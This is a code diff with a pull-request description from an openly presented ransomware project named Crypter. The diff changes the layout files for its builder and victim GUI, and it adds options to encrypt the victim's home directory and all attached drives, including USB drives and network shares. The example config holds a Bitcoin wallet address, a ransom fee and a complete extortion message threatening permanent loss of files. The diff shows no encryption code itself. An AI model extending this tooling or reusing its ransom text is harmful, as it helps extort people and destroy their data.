+                                                                                <event name="OnMouseWheel"></event>
+                                                                                <event name="OnPaint"></event>
+                                                                                <event name="OnRightDClick"></event>
+                                                                                <event name="OnRightDown"></event>
+                                                                                <event name="OnRightUp"></event>
+                                                                                <event name="OnSetFocus"></event>
+                                                                                <event name="OnSize"></event>
+                                                                                <event name="OnUpdateUI"></event>
+                                                                            </object>
+                                                                        </object>
+                                                                    </object>
+                                                                </object>
+                                                                <object class="sizeritem" expanded="1">
+                                                                    <property name="border">5</property>
+                                                                    <property name="flag">wxEXPAND</property>
+                                                                    <property name="proportion">1</property>
+                                                                    <object class="spacer" expanded="1">
+                                                                        <property name="height">0</property>
+                                                                        <property name="permission">protected</property>
+                                                                        <property name="width">0</property>
+                                                                    </object>
+                                                                </object>
+                                                                <object class="sizeritem" expanded="0">
+                                                                    <property name="border">5</property>
+                                                                    <property name="flag">wxEXPAND</property>
+                                                                    <property name="proportion">2</property>
+                                                                    <object class="wxBoxSizer" expanded="0">
+                                                                        <property name="minimum_size"></property>
+                                                                        <property name="name">bSizer2032131</property>
+                                                                        <property name="orient">wxHORIZONTAL</property>
+                                                                        <property name="permission">none</property>
+                                                                        <object class="sizeritem" expanded="0">
+                                                                            <property name="border">5</property>
+                                                                            <property name="flag">wxALIGN_CENTER_VERTICAL|wxALL</property>
+                                                                            <property name="proportion">0</property>
+                                                                            <object class="wxCheckBox" expanded="0">
+                                                                                <property name="BottomDockable">1</property>
+                                                                                <property name="LeftDockable">1</property>
+                                                                                <property name="RightDockable">1</property>
+                                                                                <property name="TopDockable">1</property>
+                                                                                <property name="aui_layer"></property>
+                                                                                <property name="aui_name"></property>
+                                                                                <property name="aui_position"></property>
+                                                                                <property name="aui_row"></property>
+                                                                                <property name="best_size"></property>
+                                                                                <property name="bg"></property>
+                                                                                <property name="caption"></property>
+                                                                                <property name="caption_visible">1</property>
+                                                                                <property name="center_pane">0</property>
+                                                                                <property name="checked">0</property>
+                                                                                <property name="close_button">1</property>
+                                                                                <property name="context_help"></property>
+                                                                                <property name="context_menu">1</property>
+                                                                                <property name="default_pane">0</property>
+                                                                                <property name="dock">Dock</property>
+                                                                                <property name="dock_fixed">0</property>
+                                                                                <property name="docking">Left</property>
+                                                                                <property name="enabled">1</property>
+                                                                                <property name="fg"></property>
+                                                                                <property name="floatable">1</property>
+                                                                                <property name="font"></property>
+                                                                                <property name="gripper">0</property>
+                                                                                <property name="hidden">0</property>
+                                                                                <property name="id">wxID_ANY</property>
+                                                                                <property name="label">Encrypt User Home</property>
+                                                                                <property name="max_size"></property>
+                                                                                <property name="maximize_button">0</property>
+                                                                                <property name="maximum_size"></property>
+                                                                                <property name="min_size"></property>
+                                                                                <property name="minimize_button">0</property>
+                                                                                <property name="minimum_size"></property>
+                                                                                <property name="moveable">1</property>
+                                                                                <property name="name">EncryptUserHomeCheckbox</property>
+                                                                                <property name="pane_border">1</property>
+                                                                                <property name="pane_position"></property>
+                                                                                <property name="pane_size"></property>
+                                                                                <property name="permission">protected</property>
+                                                                                <property name="pin_button">1</property>
+                                                                                <property name="pos"></property>
+                                                                                <property name="resize">Resizable</property>
+                                                                                <property name="show">1</property>
+                                                                                <property name="size"></property>
+                                                                                <property name="style"></property>
+                                                                                <property name="subclass"></property>
+                                                                                <property name="toolbar_pane">0</property>
+                                                                                <property name="tooltip">If ticked, all files and folders in the victim&apos;s home directory (such as Downloads, Documents and Pictures) will be encrypted.</property>
+                                                                                <property name="validator_data_type"></property>
+                                                                                <property name="validator_style">wxFILTER_NONE</property>
+                                                                                <property name="validator_type">wxDefaultValidator</property>
+                                                                                <property name="validator_variable"></property>
+                                                                                <property name="window_extra_style"></property>
+                                                                                <property name="window_name"></property>
+                                                                                <property name="window_style"></property>
+                                                                                <event name="OnChar"></event>
+                                                                                <event name="OnCheckBox"></event>
+                                                                                <event name="OnEnterWindow"></event>
+                                                                                <event name="OnEraseBackground"></event>
+                                                                                <event name="OnKeyDown"></event>
+                                                                                <event name="OnKeyUp"></event>
+                                                                                <event name="OnKillFocus"></event>
+                                                                                <event name="OnLeaveWindow"></event>
+                                                                                <event name="OnLeftDClick"></event>
+                                                                                <event name="OnLeftDown"></event>
+                                                                                <event name="OnLeftUp"></event>
+                                                                                <event name="OnMiddleDClick"></event>
+                                                                                <event name="OnMiddleDown"></event>
+                                                                                <event name="OnMiddleUp"></event>
+                                                                                <event name="OnMotion"></event>
+                                                                                <event name="OnMouseEvents"></event>
+                                                                                <event name="OnMouseWheel"></event>
+                                                                                <event name="OnPaint"></event>
+                                                                                <event name="OnRightDClick"></event>
+                                                                                <event name="OnRightDown"></event>
+                                                                                <event name="OnRightUp"></event>
+                                                                                <event name="OnSetFocus"></event>
+                                                                                <event name="OnSize"></event>
+                                                                                <event name="OnUpdateUI"></event>
+                                                                            </object>
+                                                                        </object>
+                                                                    </object>
+                                                                </object>
+                                                            </object>
+                                                        </object>
+                                                        <object class="sizeritem" expanded="1">
+                                                            <property name="border">5</property>
+                                                            <property name="flag">wxEXPAND | wxALL</property>
+                                                            <property name="proportion">0</property>
+                                                            <object class="wxStaticLine" expanded="1">
+                                                                <property name="BottomDockable">1</property>
+                                                                <property name="LeftDockable">1</property>
+                                                                <property name="RightDockable">1</property>
+                                                                <property name="TopDockable">1</property>
+                                                                <property name="aui_layer"></property>
+                                                                <property name="aui_name"></property>
+                                                                <property name="aui_position"></property>
+                                                                <property name="aui_row"></property>
+                                                                <property name="best_size"></property>
+                                                                <property name="bg"></property>
+                                                                <property name="caption"></property>
+                                                                <property name="caption_visible">1</property>
+                                                                <property name="center_pane">0</property>
+                                                                <property name="close_button">1</property>
+                                                                <property name="context_help"></property>
+                                                                <property name="context_menu">1</property>
+                                                                <property name="default_pane">0</property>
+                                                                <property name="dock">Dock</property>
+                                                                <property name="dock_fixed">0</property>
+                                                                <property name="docking">Left</property>
+                                                                <property name="enabled">1</property>
+                                                                <property name="fg"></property>
+                                                                <property name="floatable">1</property>
+                                                                <property name="font"></property>
+                                                                <property name="gripper">0</property>
+                                                                <property name="hidden">0</property>
+                                                                <property name="id">wxID_ANY</property>
+                                                                <property name="max_size"></property>
+                                                                <property name="maximize_button">0</property>
+                                                                <property name="maximum_size"></property>
+                                                                <property name="min_size"></property>
+                                                                <property name="minimize_button">0</property>
+                                                                <property name="minimum_size"></property>
+                                                                <property name="moveable">1</property>
+                                                                <property name="name">m_staticline7</property>
+                                                                <property name="pane_border">1</property>
+                                                                <property name="pane_position"></property>
+                                                                <property name="pane_size"></property>
+                                                                <property name="permission">protected</property>
+                                                                <property name="pin_button">1</property>
+                                                                <property name="pos"></property>
+                                                                <property name="resize">Resizable</property>
+                                                                <property name="show">1</property>
+                                                                <property name="size"></property>
+                                                                <property name="style">wxLI_HORIZONTAL</property>
+                                                                <property name="subclass"></property>
+                                                                <property name="toolbar_pane">0</property>
+                                                                <property name="tooltip"></property>
+                                                                <property name="window_extra_style"></property>
+                                                                <property name="window_name"></property>
+                                                                <property name="window_style"></property>
+                                                                <event name="OnChar"></event>
+                                                                <event name="OnEnterWindow"></event>
+                                                                <event name="OnEraseBackground"></event>
+                                                                <event name="OnKeyDown"></event>
+                                                                <event name="OnKeyUp"></event>
+                                                                <event name="OnKillFocus"></event>
+                                                                <event name="OnLeaveWindow"></event>
+                                                                <event name="OnLeftDClick"></event>
+                                                                <event name="OnLeftDown"></event>
+                                                                <event name="OnLeftUp"></event>
+                                                                <event name="OnMiddleDClick"></event>
+                                                                <event name="OnMiddleDown"></event>
+                                                                <event name="OnMiddleUp"></event>
+                                                                <event name="OnMotion"></event>
+                                                                <event name="OnMouseEvents"></event>
+                                                                <event name="OnMouseWheel"></event>
+                                                                <event name="OnPaint"></event>
+                                                                <event name="OnRightDClick"></event>
+                                                                <event name="OnRightDown"></event>
+                                                                <event name="OnRightUp"></event>
+                                                                <event name="OnSetFocus"></event>
+                                                                <event name="OnSize"></event>
+                                                                <event name="OnUpdateUI"></event>
+                                                            </object>
+                                                        </object>
+                                                        <object class="sizeritem" expanded="1">
                                                             <property name="border">5</property>
                                                             <property name="flag">wxEXPAND</property>
                                                             <property name="proportion">1</property>
@@ -4066,6 +4370,7 @@
                                                                 <property name="minimum_size"></property>
                                                                 <property name="name">RansomMessageSizer</property>
                                                                 <property name="orient">wxVERTICAL</property>
+                                                                <property name="parent">1</property>
                                                                 <property name="permission">none</property>
                                                                 <event name="OnUpdateUI"></event>
                                                                 <object class="sizeritem" expanded="0">
@@ -4159,6 +4464,98 @@
                                                                         <event name="OnUpdateUI"></event>
                                                                     </object>
                                                                 </object>
+                                                            </object>
+                                                        </object>
+                                                        <object class="sizeritem" expanded="1">
+                                                            <property name="border">5</property>
+                                                            <property name="flag">wxEXPAND</property>
+                                                            <property name="proportion">1</property>
+                                                            <object class="wxBoxSizer" expanded="1">
+                                                                <property name="minimum_size"></property>
+                                                                <property name="name">bSizer40</property>
+                                                                <property name="orient">wxVERTICAL</property>
+                                                                <property name="permission">none</property>
+                                                            </object>
+                                                        </object>
+                                                        <object class="sizeritem" expanded="1">
+                                                            <property name="border">5</property>
+                                                            <property name="flag">wxEXPAND | wxALL</property>
+                                                            <property name="proportion">0</property>
+                                                            <object class="wxStaticLine" expanded="1">
+                                                                <property name="BottomDockable">1</property>
+                                                                <property name="LeftDockable">1</property>
+                                                                <property name="RightDockable">1</property>
+                                                                <property name="TopDockable">1</property>
+                                                                <property name="aui_layer"></property>
+                                                                <property name="aui_name"></property>
+                                                                <property name="aui_position"></property>
+                                                                <property name="aui_row"></property>
+                                                                <property name="best_size"></property>
+                                                                <property name="bg"></property>
+                                                                <property name="caption"></property>
+                                                                <property name="caption_visible">1</property>
+                                                                <property name="center_pane">0</property>
+                                                                <property name="close_button">1</property>
+                                                                <property name="context_help"></property>
+                                                                <property name="context_menu">1</property>
+                                                                <property name="default_pane">0</property>
+                                                                <property name="dock">Dock</property>
+                                                                <property name="dock_fixed">0</property>
+                                                                <property name="docking">Left</property>
+                                                                <property name="enabled">1</property>
+                                                                <property name="fg"></property>
+                                                                <property name="floatable">1</property>
+                                                                <property name="font"></property>
+                                                                <property name="gripper">0</property>
+                                                                <property name="hidden">0</property>
+                                                                <property name="id">wxID_ANY</property>
+                                                                <property name="max_size"></property>
+                                                                <property name="maximize_button">0</property>
+                                                                <property name="maximum_size"></property>
+                                                                <property name="min_size"></property>
+                                                                <property name="minimize_button">0</property>
+                                                                <property name="minimum_size"></property>
+                                                                <property name="moveable">1</property>
+                                                                <property name="name">m_staticline61</property>
+                                                                <property name="pane_border">1</property>
+                                                                <property name="pane_position"></property>
+                                                                <property name="pane_size"></property>
+                                                                <property name="permission">protected</property>
+                                                                <property name="pin_button">1</property>
+                                                                <property name="pos"></property>
+                                                                <property name="resize">Resizable</property>
+                                                                <property name="show">1</property>
+                                                                <property name="size"></property>
+                                                                <property name="style">wxLI_HORIZONTAL</property>
+                                                                <property name="subclass"></property>
+                                                                <property name="toolbar_pane">0</property>
+                                                                <property name="tooltip"></property>
+                                                                <property name="window_extra_style"></property>
+                                                                <property name="window_name"></property>
+                                                                <property name="window_style"></property>
+                                                                <event name="OnChar"></event>
+                                                                <event name="OnEnterWindow"></event>
+                                                                <event name="OnEraseBackground"></event>
+                                                                <event name="OnKeyDown"></event>
+                                                                <event name="OnKeyUp"></event>
+                                                                <event name="OnKillFocus"></event>
+                                                                <event name="OnLeaveWindow"></event>
+                                                                <event name="OnLeftDClick"></event>
+                                                                <event name="OnLeftDown"></event>
+                                                                <event name="OnLeftUp"></event>
+                                                                <event name="OnMiddleDClick"></event>
+                                                                <event name="OnMiddleDown"></event>
+                                                                <event name="OnMiddleUp"></event>
+                                                                <event name="OnMotion"></event>
+                                                                <event name="OnMouseEvents"></event>
+                                                                <event name="OnMouseWheel"></event>
+                                                                <event name="OnPaint"></event>
+                                                                <event name="OnRightDClick"></event>
+                                                                <event name="OnRightDown"></event>
+                                                                <event name="OnRightUp"></event>
+                                                                <event name="OnSetFocus"></event>
+                                                                <event name="OnSize"></event>
+                                                                <event name="OnUpdateUI"></event>
                                                             </object>
                                                         </object>
                                                     </object>
@@ -4782,6 +5179,7 @@
                                     <property name="minimum_size"></property>
                                     <property name="name">ConsoleBoxSizer</property>
                                     <property name="orient">wxVERTICAL</property>
+                                    <property name="parent">1</property>
                                     <property name="permission">none</property>
                                     <event name="OnUpdateUI"></event>
                                     <object class="sizeritem" expanded="0">
@@ -5525,6 +5923,7 @@
                                             <property name="minimum_size"></property>
                                             <property name="name">DocumentFilesSizer</property>
                                             <property name="orient">wxVERTICAL</property>
+                                            <property name="parent">1</property>
                                             <property name="permission">none</property>
                                             <event name="OnUpdateUI"></event>
                                             <object class="sizeritem" expanded="0">
@@ -6748,6 +7147,7 @@
                                             <property name="minimum_size"></property>
                                             <property name="name">ImageFileszSizer</property>
                                             <property name="orient">wxVERTICAL</property>
+                                            <property name="parent">1</property>
                                             <property name="permission">none</property>
                                             <event name="OnUpdateUI"></event>
                                         </object>
@@ -6762,6 +7162,7 @@
                                             <property name="minimum_size"></property>
                                             <property name="name">VideoFilesSizer</property>
                                             <property name="orient">wxVERTICAL</property>
+                                            <property name="parent">1</property>
                                             <property name="permission">none</property>
                                             <event name="OnUpdateUI"></event>
                                         </object>

--- a/build/builder_gui/crypter_builder_final.fbp
+++ b/build/builder_gui/crypter_builder_final.fbp
@@ -45,7 +45,7 @@
             <property name="name">MainFrame</property>
             <property name="pos"></property>
             <property name="size">640,850</property>
-            <property name="style">wxCAPTION|wxCLOSE_BOX|wxMINIMIZE_BOX|wxSYSTEM_MENU</property>
+            <property name="style">wxCAPTION|wxCLOSE_BOX|wxMINIMIZE_BOX|wxRESIZE_BORDER|wxSYSTEM_MENU</property>
             <property name="subclass"></property>
             <property name="title">Crypter Builder</property>
             <property name="tooltip"></property>

--- a/build/config_example.cfg
+++ b/build/config_example.cfg
@@ -3,6 +3,8 @@
       "pyinstaller_aes_key": "0123456789ANCDEF", 
       "icon_file": "C:\\dev\\Crypter\\build\\Resources\\pdf.ico", 
       "upx_dir": "C:\\dev\\Crypter\\build\\upx394w", 
+      "encrypt_attached_drives": true, 
+      "encrypt_user_home": true, 
       "encrypted_file_extension": "crypter", 
       "wallet_address": "12mdKVNfAhLbRDLtRWQFhQgydgU6bUMjay", 
       "bitcoin_fee": "0.08134", 
@@ -23,5 +25,5 @@
             "tsx"
       ], 
       "ransom_message": "The important files on your computer have been encrypted with military grade AES-256 bit encryption.\n\nYour documents, videos, images and other forms of data are now inaccessible, and cannot be unlocked without the decryption key. This key is currently being stored on a remote server.\n\nTo acquire this key, transfer the Bitcoin Fee to the specified wallet address before the time runs out.\n\nIf you fail to take action within this time window, the decryption key will be destroyed and access to your files will be permanently lost.", 
-      "debug_level": "1 - Low"
+      "debug_level": "3 - High"
 }

--- a/gui/final.fbp
+++ b/gui/final.fbp
@@ -41,11 +41,11 @@
             <property name="hidden">0</property>
             <property name="id">wxID_ANY</property>
             <property name="maximum_size">-1,-1</property>
-            <property name="minimum_size">940,780</property>
+            <property name="minimum_size">-1,-1</property>
             <property name="name">MainFrame</property>
             <property name="pos"></property>
-            <property name="size">-1,-1</property>
-            <property name="style">wxCAPTION|wxCLOSE_BOX|wxMINIMIZE_BOX|wxSYSTEM_MENU</property>
+            <property name="size">940,800</property>
+            <property name="style">wxCAPTION|wxCLOSE_BOX|wxMINIMIZE_BOX|wxRESIZE_BORDER|wxSYSTEM_MENU</property>
             <property name="subclass"></property>
             <property name="title">Crypter</property>
             <property name="tooltip"></property>
@@ -1260,11 +1260,11 @@
                                     <property name="parent">1</property>
                                     <property name="permission">none</property>
                                     <event name="OnUpdateUI"></event>
-                                    <object class="sizeritem" expanded="1">
+                                    <object class="sizeritem" expanded="0">
                                         <property name="border">5</property>
                                         <property name="flag">wxALL|wxEXPAND</property>
                                         <property name="proportion">1</property>
-                                        <object class="wxPanel" expanded="1">
+                                        <object class="wxPanel" expanded="0">
                                             <property name="BottomDockable">1</property>
                                             <property name="LeftDockable">1</property>
                                             <property name="RightDockable">1</property>
@@ -1702,35 +1702,35 @@
                                                     <property name="flag">wxALIGN_RIGHT|wxEXPAND</property>
                                                     <property name="proportion">2</property>
                                                     <object class="wxBoxSizer" expanded="0">
-                                                        <property name="minimum_size"></property>
+                                                        <property name="minimum_size">-1,40</property>
                                                         <property name="name">bSizer19</property>
                                                         <property name="orient">wxHORIZONTAL</property>
                                                         <property name="permission">none</property>
-                                                        <object class="sizeritem" expanded="0">
+                                                        <object class="sizeritem" expanded="1">
                                                             <property name="border">5</property>
                                                             <property name="flag">wxEXPAND</property>
                                                             <property name="proportion">1</property>
-                                                            <object class="spacer" expanded="0">
+                                                            <object class="spacer" expanded="1">
                                                                 <property name="height">0</property>
                                                                 <property name="permission">protected</property>
                                                                 <property name="width">0</property>
                                                             </object>
                                                         </object>
-                                                        <object class="sizeritem" expanded="0">
+                                                        <object class="sizeritem" expanded="1">
                                                             <property name="border">5</property>
                                                             <property name="flag">wxEXPAND</property>
                                                             <property name="proportion">1</property>
-                                                            <object class="spacer" expanded="0">
+                                                            <object class="spacer" expanded="1">
                                                                 <property name="height">0</property>
                                                                 <property name="permission">protected</property>
                                                                 <property name="width">0</property>
                                                             </object>
                                                         </object>
-                                                        <object class="sizeritem" expanded="0">
+                                                        <object class="sizeritem" expanded="1">
                                                             <property name="border">5</property>
                                                             <property name="flag">wxALL|wxEXPAND</property>
                                                             <property name="proportion">1</property>
-                                                            <object class="wxButton" expanded="0">
+                                                            <object class="wxButton" expanded="1">
                                                                 <property name="BottomDockable">1</property>
                                                                 <property name="LeftDockable">1</property>
                                                                 <property name="RightDockable">1</property>
@@ -1765,7 +1765,7 @@
                                                                 <property name="maximum_size"></property>
                                                                 <property name="min_size"></property>
                                                                 <property name="minimize_button">0</property>
-                                                                <property name="minimum_size">30,30</property>
+                                                                <property name="minimum_size">-1,-1</property>
                                                                 <property name="moveable">1</property>
                                                                 <property name="name">ViewEncryptedFilesButton</property>
                                                                 <property name="pane_border">1</property>
@@ -1814,11 +1814,11 @@
                                                                 <event name="OnUpdateUI"></event>
                                                             </object>
                                                         </object>
-                                                        <object class="sizeritem" expanded="0">
+                                                        <object class="sizeritem" expanded="1">
                                                             <property name="border">5</property>
                                                             <property name="flag">wxALL|wxEXPAND</property>
                                                             <property name="proportion">1</property>
-                                                            <object class="wxButton" expanded="0">
+                                                            <object class="wxButton" expanded="1">
                                                                 <property name="BottomDockable">1</property>
                                                                 <property name="LeftDockable">1</property>
                                                                 <property name="RightDockable">1</property>
@@ -1853,7 +1853,7 @@
                                                                 <property name="maximum_size"></property>
                                                                 <property name="min_size"></property>
                                                                 <property name="minimize_button">0</property>
-                                                                <property name="minimum_size"></property>
+                                                                <property name="minimum_size">-1,-1</property>
                                                                 <property name="moveable">1</property>
                                                                 <property name="name">EnterDecryptionKeyButton</property>
                                                                 <property name="pane_border">1</property>

--- a/gui/final.fbp
+++ b/gui/final.fbp
@@ -41,7 +41,7 @@
             <property name="hidden">0</property>
             <property name="id">wxID_ANY</property>
             <property name="maximum_size">-1,-1</property>
-            <property name="minimum_size"></property>
+            <property name="minimum_size">940,780</property>
             <property name="name">MainFrame</property>
             <property name="pos"></property>
             <property name="size">-1,-1</property>
@@ -89,14 +89,14 @@
             <event name="OnSize"></event>
             <event name="OnUpdateUI"></event>
             <object class="wxBoxSizer" expanded="1">
-                <property name="minimum_size">940,750</property>
+                <property name="minimum_size">-1,-1</property>
                 <property name="name">MainSizer</property>
                 <property name="orient">wxVERTICAL</property>
                 <property name="permission">none</property>
                 <object class="sizeritem" expanded="0">
                     <property name="border">5</property>
                     <property name="flag">wxALL|wxEXPAND</property>
-                    <property name="proportion">0</property>
+                    <property name="proportion">1</property>
                     <object class="wxPanel" expanded="0">
                         <property name="BottomDockable">1</property>
                         <property name="LeftDockable">1</property>
@@ -177,7 +177,7 @@
                             <property name="orient">wxVERTICAL</property>
                             <property name="permission">none</property>
                             <object class="sizeritem" expanded="0">
-                                <property name="border">20</property>
+                                <property name="border">10</property>
                                 <property name="flag">wxALIGN_CENTER_HORIZONTAL|wxALL</property>
                                 <property name="proportion">0</property>
                                 <object class="wxStaticText" expanded="0">
@@ -345,11 +345,11 @@
                         </object>
                     </object>
                 </object>
-                <object class="sizeritem" expanded="0">
+                <object class="sizeritem" expanded="1">
                     <property name="border">20</property>
                     <property name="flag">wxALL|wxEXPAND</property>
-                    <property name="proportion">3</property>
-                    <object class="wxPanel" expanded="0">
+                    <property name="proportion">2</property>
+                    <object class="wxPanel" expanded="1">
                         <property name="BottomDockable">1</property>
                         <property name="LeftDockable">1</property>
                         <property name="RightDockable">1</property>
@@ -423,34 +423,34 @@
                         <event name="OnSetFocus"></event>
                         <event name="OnSize"></event>
                         <event name="OnUpdateUI"></event>
-                        <object class="wxBoxSizer" expanded="0">
+                        <object class="wxBoxSizer" expanded="1">
                             <property name="minimum_size"></property>
                             <property name="name">BodySizer</property>
                             <property name="orient">wxVERTICAL</property>
                             <property name="permission">none</property>
-                            <object class="sizeritem" expanded="0">
+                            <object class="sizeritem" expanded="1">
                                 <property name="border">5</property>
                                 <property name="flag">wxEXPAND</property>
                                 <property name="proportion">1</property>
-                                <object class="wxBoxSizer" expanded="0">
+                                <object class="wxBoxSizer" expanded="1">
                                     <property name="minimum_size"></property>
                                     <property name="name">bSizer15</property>
                                     <property name="orient">wxHORIZONTAL</property>
                                     <property name="permission">none</property>
-                                    <object class="sizeritem" expanded="0">
+                                    <object class="sizeritem" expanded="1">
                                         <property name="border">5</property>
-                                        <property name="flag">wxEXPAND</property>
+                                        <property name="flag"></property>
                                         <property name="proportion">1</property>
-                                        <object class="wxBoxSizer" expanded="0">
+                                        <object class="wxBoxSizer" expanded="1">
                                             <property name="minimum_size"></property>
                                             <property name="name">bSizer17</property>
                                             <property name="orient">wxHORIZONTAL</property>
                                             <property name="permission">none</property>
-                                            <object class="sizeritem" expanded="0">
+                                            <object class="sizeritem" expanded="1">
                                                 <property name="border">5</property>
                                                 <property name="flag">wxALIGN_CENTER_HORIZONTAL|wxEXPAND</property>
                                                 <property name="proportion">0</property>
-                                                <object class="wxBoxSizer" expanded="0">
+                                                <object class="wxBoxSizer" expanded="1">
                                                     <property name="minimum_size"></property>
                                                     <property name="name">bSizer20</property>
                                                     <property name="orient">wxVERTICAL</property>
@@ -538,11 +538,11 @@
                                                                 <property name="name">bSizer192</property>
                                                                 <property name="orient">wxVERTICAL</property>
                                                                 <property name="permission">none</property>
-                                                                <object class="sizeritem" expanded="1">
+                                                                <object class="sizeritem" expanded="0">
                                                                     <property name="border">7</property>
                                                                     <property name="flag">wxALIGN_CENTER_HORIZONTAL|wxALL</property>
                                                                     <property name="proportion">0</property>
-                                                                    <object class="wxStaticBitmap" expanded="1">
+                                                                    <object class="wxStaticBitmap" expanded="0">
                                                                         <property name="BottomDockable">1</property>
                                                                         <property name="LeftDockable">1</property>
                                                                         <property name="RightDockable">1</property>
@@ -625,7 +625,7 @@
                                                     <object class="sizeritem" expanded="0">
                                                         <property name="border">5</property>
                                                         <property name="flag">wxALL|wxEXPAND</property>
-                                                        <property name="proportion">1</property>
+                                                        <property name="proportion">0</property>
                                                         <object class="wxPanel" expanded="0">
                                                             <property name="BottomDockable">1</property>
                                                             <property name="LeftDockable">1</property>
@@ -789,7 +789,7 @@
                                                                     </object>
                                                                 </object>
                                                                 <object class="sizeritem" expanded="0">
-                                                                    <property name="border">0</property>
+                                                                    <property name="border">5</property>
                                                                     <property name="flag">wxALIGN_CENTER_HORIZONTAL|wxALIGN_CENTER_VERTICAL|wxALL</property>
                                                                     <property name="proportion">0</property>
                                                                     <object class="wxStaticText" expanded="0">
@@ -935,7 +935,7 @@
                                                             <property name="resize">Resizable</property>
                                                             <property name="show">1</property>
                                                             <property name="size"></property>
-                                                            <property name="style">wxTE_MULTILINE|wxTE_NO_VSCROLL|wxTE_READONLY</property>
+                                                            <property name="style">wxTE_MULTILINE|wxTE_READONLY</property>
                                                             <property name="subclass"></property>
                                                             <property name="toolbar_pane">0</property>
                                                             <property name="tooltip"></property>
@@ -986,7 +986,7 @@
                     </object>
                 </object>
                 <object class="sizeritem" expanded="1">
-                    <property name="border">7</property>
+                    <property name="border">20</property>
                     <property name="flag">wxALL|wxEXPAND</property>
                     <property name="proportion">1</property>
                     <object class="wxPanel" expanded="1">
@@ -1153,7 +1153,7 @@
                                         <property name="permission">none</property>
                                         <object class="sizeritem" expanded="0">
                                             <property name="border">5</property>
-                                            <property name="flag">wxALIGN_CENTER_HORIZONTAL|wxALL</property>
+                                            <property name="flag">wxALIGN_CENTER|wxALIGN_CENTER_HORIZONTAL|wxALIGN_CENTER_VERTICAL|wxALL</property>
                                             <property name="proportion">0</property>
                                             <object class="wxBitmapButton" expanded="0">
                                                 <property name="BottomDockable">1</property>
@@ -1191,10 +1191,10 @@
                                                 <property name="label">MyButton</property>
                                                 <property name="max_size"></property>
                                                 <property name="maximize_button">0</property>
-                                                <property name="maximum_size"></property>
+                                                <property name="maximum_size">-1,-1</property>
                                                 <property name="min_size"></property>
                                                 <property name="minimize_button">0</property>
-                                                <property name="minimum_size"></property>
+                                                <property name="minimum_size">-1,-1</property>
                                                 <property name="moveable">1</property>
                                                 <property name="name">BitcoinButton</property>
                                                 <property name="pane_border">1</property>
@@ -1257,13 +1257,14 @@
                                     <property name="minimum_size"></property>
                                     <property name="name">sbSizer2</property>
                                     <property name="orient">wxVERTICAL</property>
+                                    <property name="parent">1</property>
                                     <property name="permission">none</property>
                                     <event name="OnUpdateUI"></event>
-                                    <object class="sizeritem" expanded="0">
+                                    <object class="sizeritem" expanded="1">
                                         <property name="border">5</property>
                                         <property name="flag">wxALL|wxEXPAND</property>
                                         <property name="proportion">1</property>
-                                        <object class="wxPanel" expanded="0">
+                                        <object class="wxPanel" expanded="1">
                                             <property name="BottomDockable">1</property>
                                             <property name="LeftDockable">1</property>
                                             <property name="RightDockable">1</property>
@@ -1764,7 +1765,7 @@
                                                                 <property name="maximum_size"></property>
                                                                 <property name="min_size"></property>
                                                                 <property name="minimize_button">0</property>
-                                                                <property name="minimum_size"></property>
+                                                                <property name="minimum_size">30,30</property>
                                                                 <property name="moveable">1</property>
                                                                 <property name="name">ViewEncryptedFilesButton</property>
                                                                 <property name="pane_border">1</property>
@@ -2310,6 +2311,7 @@
                             <property name="minimum_size"></property>
                             <property name="name">MainSizer</property>
                             <property name="orient">wxVERTICAL</property>
+                            <property name="parent">1</property>
                             <property name="permission">none</property>
                             <event name="OnUpdateUI"></event>
                             <object class="sizeritem" expanded="1">


### PR DESCRIPTION
Adds capability to encrypt all attached drives (such as USBs, internals, externals, network shares etc.), as well as all files and directories in the the user's homespace. Also added configuration options for both of these so the user can specify, using the builder, whether to use them.

If neither option is selected and Crypter is built, it will not encrypt any files. This is good for testing the GUI/simulating the ransomware without actually encrypting any files